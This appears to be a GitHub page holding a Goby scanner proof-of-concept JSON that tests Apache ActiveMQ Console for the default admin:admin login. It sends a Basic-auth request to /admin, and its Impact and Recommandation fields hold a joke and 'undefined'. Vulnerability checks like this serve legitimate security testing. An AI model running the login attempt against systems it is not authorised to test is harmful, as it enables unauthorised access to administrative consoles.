-
Notifications
You must be signed in to change notification settings - Fork 0
/
Apache ActiveMQ Console控制台弱口令.json
55 lines (55 loc) · 2.02 KB
/
Apache ActiveMQ Console控制台弱口令.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
{
"Name": "Apache ActiveMQ Console控制台弱口令",
"Level": "2",
"Tags": [
"弱口令"
],
"GobyQuery": "app=\"Apache-ActiveMQ\"",
"Description": "Apache ActiveMQ Console 存在默认弱口令 admin:admin,进入控制台后可被进一步恶意利用",
"Product": "Apache ActiveMQ",
"Homepage": "http://activemq.apache.org/",
"Author": "PeiQi",
"Impact": "<p><span style=\"color: rgb(65, 140, 175);\"><b>咩咩咩</b></span>🐑</p>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/admin",
"follow_redirect": true,
"header": {
"Authorization": "Basic YWRtaW46YWRtaW4="
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Version",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-01-21 22:11:54",
"GobyVersion": "1.8.237"
}